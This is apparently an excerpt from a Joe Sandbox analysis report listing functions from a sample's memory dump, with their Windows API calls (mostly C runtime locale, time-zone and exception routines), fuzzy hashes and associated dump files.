Opcode Fuzzy Hash: 9801d3cdee6536add18e393c3b4b7f9ab2f1a3a1615471bc2363cec11a39119e
Instruction Fuzzy Hash: 2611A732A04655ABCB249F69DC49A76F7ECE785711F014A2BEC16D3740EB359D40C690

Function 001C38A0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ed78c7c429dff4e87f4ebae4af2bdfb9d68bf7abf48bfa11f875b6aae70124
Instruction ID: 9e82bb1f4c75ee955ad603fd58bda7f0381144ef7759d009bd1600940f291c2c
Opcode Fuzzy Hash: 55ed78c7c429dff4e87f4ebae4af2bdfb9d68bf7abf48bfa11f875b6aae70124
Instruction Fuzzy Hash: 1DF10D71E002199FDF14CFA9D880BADB7B1EF98324F15826DE825AB390D7319E45CB94

Function 001CD192 Relevance: 1.9, APIs: 1, Instructions: 410timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,001CD5D7,00000000,00000000,00000000), ref: 001CD496

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 8f45c4f416d90eca883c348eeabbd9322913103287e81a1dd06bf5530a13e25e
Instruction ID: ecb6534ed548218f556dc8842d8a9d3587816c313e8dd25fbb241bd1e2ef3db5
Opcode Fuzzy Hash: 8f45c4f416d90eca883c348eeabbd9322913103287e81a1dd06bf5530a13e25e
Instruction Fuzzy Hash: 7AD1E471900215AADB24ABA8AC02FBE7BB9EF74710F55406EF905EB191EB70DE41C790

Function 001CDB30 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001CDB2B,?,?,00000008,?,?,001D6AD4,00000000), ref: 001CDD5D

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3256a84ae7141119784327569a5c964b8862b2fc09319fb6151371f952d7f6bc
Instruction ID: 0cc1abd6c38a245dddfae1b3ebfe1d270f818ac054e51b92db913d9b5767bd59
Opcode Fuzzy Hash: 3256a84ae7141119784327569a5c964b8862b2fc09319fb6151371f952d7f6bc
Instruction Fuzzy Hash: E5B149316106099FDB19CF28D486F657BE0FF55364F26866CE89ACF2A1C335E992CB40

Function 001B801C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001B8032

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 2137feaa5ccf6190a925ee97e91506493c36989ade3b1b48432acf8ff62b25a8
Instruction ID: b4428f007b055ef744e3746eff9bf263cdfb6c877c30bf10a00c1503bb7794b4
Opcode Fuzzy Hash: 2137feaa5ccf6190a925ee97e91506493c36989ade3b1b48432acf8ff62b25a8
Instruction Fuzzy Hash: BF518CB1E11215DFEB14CF69E8917AABBF8FB48741F14802AD411EB290D775DA41CF90

Function 001BFA8E Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

0, xrefs: 001BFC23

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d60aba14c9893a4571549967f5b6d5ca18b6deba3920326a03aa90f7a01d1f51
Instruction ID: 85424b1ac5d43ffb208086f16305a0783a0ca6ca0b8101549d4491f0c972113e
Opcode Fuzzy Hash: d60aba14c9893a4571549967f5b6d5ca18b6deba3920326a03aa90f7a01d1f51
Instruction Fuzzy Hash: 47E1AD306006098FCB28DF68C990AFEB7B1FF59314B25866DD45A9B2A1D730ED87CB51

Function 001BF700 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 001BF88E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c13fcc5d35ab0139a3bbeda3536fb79a0b1dcf5b3dceccbc53acc3d4e9086e41
Instruction ID: 649150e09d6c8680d3d5bd89fcddef0a824707ae1da2718b3a2014ed7d27ea2a
Opcode Fuzzy Hash: c13fcc5d35ab0139a3bbeda3536fb79a0b1dcf5b3dceccbc53acc3d4e9086e41
Instruction Fuzzy Hash: B5C1DF70A006468FCB28CF68CC84AFABBA1EF59314F24467DE49697291DB30ED47CB51

Function 001D3A7A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 001CAE3C: GetLastError.KERNEL32(?,00000008,001D03BC), ref: 001CAE40
Part of subcall function 001CAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 001CAEE2

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001D3ACE

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 363f5a61967ef14c5a5b619926fbfa50e7576489c4d236e6984f7c0f8d61c3f0
Instruction ID: f124753ad2d7c93075263dd1b59463cf261de5cb3013a27447ee9223ecbd035d
Opcode Fuzzy Hash: 363f5a61967ef14c5a5b619926fbfa50e7576489c4d236e6984f7c0f8d61c3f0
Instruction Fuzzy Hash: 7621C272601256ABDB18DF29DC42EBA73A8EF54714B10007BFD11D7241EB74DE448B51

Function 001D3701 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001CAE3C: GetLastError.KERNEL32(?,00000008,001D03BC), ref: 001CAE40
Part of subcall function 001CAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 001CAEE2

EnumSystemLocalesW.KERNEL32(001D3827,00000001,00000000,?,-00000050,?,001D3E58,00000000,?,?,?,00000055,?), ref: 001D3773

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a5f834f6b3fc020a666544e01d27fc1a70c81b7032b1efac4101d1e70215c631
Instruction ID: 734fa1dceee3e2bcee67aea0eac97541323dd97ffbca5ccca776f07671dadf5a
Opcode Fuzzy Hash: a5f834f6b3fc020a666544e01d27fc1a70c81b7032b1efac4101d1e70215c631
Instruction Fuzzy Hash: 43114C7B6007055FDB189F39C89197AB791FF80318B14452DE55647B40D371B943C740

Function 001D3CA9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 001CAE3C: GetLastError.KERNEL32(?,00000008,001D03BC), ref: 001CAE40
Part of subcall function 001CAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 001CAEE2

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001D3A43,00000000,00000000,?), ref: 001D3CD5

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 638420f9904b301e89b152c8a1f31386b4d5c2f567e665d8485b1bbc1166c06d
Instruction ID: edc289eb97319cd1d3eff1d882326beb9e6fa3e16f16d008c14a1c985af89798
Opcode Fuzzy Hash: 638420f9904b301e89b152c8a1f31386b4d5c2f567e665d8485b1bbc1166c06d
Instruction Fuzzy Hash: D3F02D326005157BDB285764CC06BBA7765EB40754F55042AEC12A3380DB74FF42CAD1

Function 001D379C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001CAE3C: GetLastError.KERNEL32(?,00000008,001D03BC), ref: 001CAE40
Part of subcall function 001CAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 001CAEE2

EnumSystemLocalesW.KERNEL32(001D3A7A,00000001,?,?,-00000050,?,001D3E1C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 001D37E6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: cd04cf6d53b8ca9df2750f32487950e6000f97bce5d774f5caf05150940004b4
Instruction ID: d7832cdfa7b3dea23aabfe57dc27a3c00bb242f040858fe96cdb74723071a728
Opcode Fuzzy Hash: cd04cf6d53b8ca9df2750f32487950e6000f97bce5d774f5caf05150940004b4
Instruction Fuzzy Hash: 33F0F6B63007056FDB149F39D8C6A7A7B91FF80768F05442EFA458BB90D7B19D42C650

Function 001CC7A2 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 001C72CA: EnterCriticalSection.KERNEL32(?,?,001D163A,00000000,001F11A8,0000000C,001D1601,?,?,001CC75E,?,?,001CAFDA,00000001,00000364,?), ref: 001C72D9

EnumSystemLocalesW.KERNEL32(Function_0003C795,00000001,001F10C8,0000000C,001CCBC4,?), ref: 001CC7DA

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 60677f7669d8b6f6793ed72570e0ce9078d545e3d42b44f97c2b740027c6a31a
Instruction ID: 8a38382ce9df2bcb80cc190552fd49ca05d82798af127dc4a9b7e99f1a02bfca
Opcode Fuzzy Hash: 60677f7669d8b6f6793ed72570e0ce9078d545e3d42b44f97c2b740027c6a31a
Instruction Fuzzy Hash: 3CF03732A04704EFD700EF98E842BAD77F1FB68720F10412AF5149B2A0DB758981CF40

Function 001B71C1 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,001B4EEC,00000000,001EB6C9,00000004,001B3D92,001EB6C9,00000004,001B41A5,00000000,00000000), ref: 001B71DA

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a4b30df4a848f5c16aa5e2ec0c1e6f8bd0a80480b21cfd5386c7a7902d55449d
Instruction ID: 7b8690d72e6011a328af876e75fac09c738c6e7ff9050bf496eda763c8813b73
Opcode Fuzzy Hash: a4b30df4a848f5c16aa5e2ec0c1e6f8bd0a80480b21cfd5386c7a7902d55449d
Instruction Fuzzy Hash: E9E0D872298204B6D75AABBC9D1FFAA37ECD75470AF504181F102D90C1C7A0CB00D271

Function 001D36B6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001CAE3C: GetLastError.KERNEL32(?,00000008,001D03BC), ref: 001CAE40
Part of subcall function 001CAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 001CAEE2

EnumSystemLocalesW.KERNEL32(001D360F,00000001,?,?,?,001D3E7A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001D36ED

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a6d7779db7e2d2de24f66319749a12fc79fe08416973b4200d75fc9d2ea8d3a3
Instruction ID: 6d25f2e7d91b532560a9d2b5e009ed96cf91651d3c55011d3c2451d7aec1a9b0
Opcode Fuzzy Hash: a6d7779db7e2d2de24f66319749a12fc79fe08416973b4200d75fc9d2ea8d3a3
Instruction Fuzzy Hash: 0AF0E53634024967CB04AF39D846A6ABF94EFC1714B46405AEA158B750C775DA43C791

Function 001CCD1F Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001CA4B1,?,20001004,00000000,00000002,?,?,001C9AB3), ref: 001CCD53

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 91f962e6f32a0e8af57ca684d802a18d13adf6b323421f29a90d800ff1626550
Instruction ID: 387559bacdb44aa0c0908955e6512418198bb2e89e96c8e3c10d08a12f908c6a
Opcode Fuzzy Hash: 91f962e6f32a0e8af57ca684d802a18d13adf6b323421f29a90d800ff1626550
Instruction Fuzzy Hash: 53E04F35502218BBCF126F60EC05FAE7F16EF64750F004026FD0966561CB31CD61AAD0

Function 001B8553 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002855F,001B7E51), ref: 001B8558

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 32c9000be96a593dab6c4f425425e8f13aeaec8ddab4f893fd79efee3390e105
Instruction ID: 08d0a00e124a5cf2991f7266ea1cab15b4cf1167f0dda972eca3b03fb3aba081
Opcode Fuzzy Hash: 32c9000be96a593dab6c4f425425e8f13aeaec8ddab4f893fd79efee3390e105
Instruction Fuzzy Hash:

Function 00192510 Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B7875: EnterCriticalSection.KERNEL32(001F4AF8,00000000,?,?,001925B6,001F571C,08E011E3,?,00000000,001D93ED,000000FF,?,00191A26), ref: 001B7880
Part of subcall function 001B7875: LeaveCriticalSection.KERNEL32(001F4AF8,?,?,001925B6,001F571C,08E011E3,?,00000000,001D93ED,000000FF,?,00191A26,?,?,?,08E011E3), ref: 001B78BD

GetProcessHeap.KERNEL32 ref: 00192565

Part of subcall function 001B782B: EnterCriticalSection.KERNEL32(001F4AF8,?,?,00192627,001F571C,001DCCC0), ref: 001B7835
Part of subcall function 001B782B: LeaveCriticalSection.KERNEL32(001F4AF8,?,?,00192627,001F571C,001DCCC0), ref: 001B7868
Part of subcall function 001B782B: RtlWakeAllConditionVariable.NTDLL ref: 001B78DF

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
String ID:
API String ID: 325507722-0
Opcode ID: 08f849de3ca61b08c19c44e10e60ca7227c69efe43fcfd4f5a5563b018f951bd
Instruction ID: 19f0d2743c33519bea6f21b7868c44fff40faa5328152acb398a6013fa80f81a
Opcode Fuzzy Hash: 08f849de3ca61b08c19c44e10e60ca7227c69efe43fcfd4f5a5563b018f951bd
Instruction Fuzzy Hash: DE21AEB0914F04EBCB10EFA4ED4A7A87BE6E705324F900319E62497BD1D7706944CF91

Function 001C6078 Relevance: .7, Instructions: 655COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: be38b7a26d08611aa2ea31345a83c278132bfa6209997761a86c1b4acfd6cd2c
Instruction ID: 6cb5988e9c4eb3fa894a23c596a506186051a0e819186477edb865e34d1b4bca
Opcode Fuzzy Hash: be38b7a26d08611aa2ea31345a83c278132bfa6209997761a86c1b4acfd6cd2c
Instruction Fuzzy Hash: 88326B74A0021ADFCB18CF98C991ABEBBB5EF65308F25456DD845A7305D732EE06CB90

Function 001CE919 Relevance: .6, Instructions: 637COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41dca2b886e427c8bfa84100a28332705f2a807d2a6f20871767989bbf65af97
Instruction ID: 70893715a4923370b4ad300bd62c5cf518619487c10c7397c9dc4d6241d7f99e
Opcode Fuzzy Hash: 41dca2b886e427c8bfa84100a28332705f2a807d2a6f20871767989bbf65af97
Instruction Fuzzy Hash: F032D132D29F414DD7239634C862339A68AAFB63C4F15D73BF819B5DA6EB29C5C38100

Function 001C18EF Relevance: .2, Instructions: 158COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241b6fb9a289495fc9e6c92dd56fb41bf9160e20364eef422bda7a05c9cbced3
Instruction ID: 5b90b4d47571883442c71a8cc29c77e9f7bb8d2b633b9a67633510c778c56851
Opcode Fuzzy Hash: 241b6fb9a289495fc9e6c92dd56fb41bf9160e20364eef422bda7a05c9cbced3
Instruction Fuzzy Hash: 64516E71E00259AFDF04CF99C991BAEBBB2EF99304F19805DE415AB202C734DE50CB90

Function 001B9730 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 71082b4ec866680491cfd694f3fd64e89445e605a30d5835189b5ec0cdf63425
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: BF11C8BB22118243D6148E3ED8F49FAB7D5EBC5321B2D437AD3428F758DB2299479D00

Function 001D03E8 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
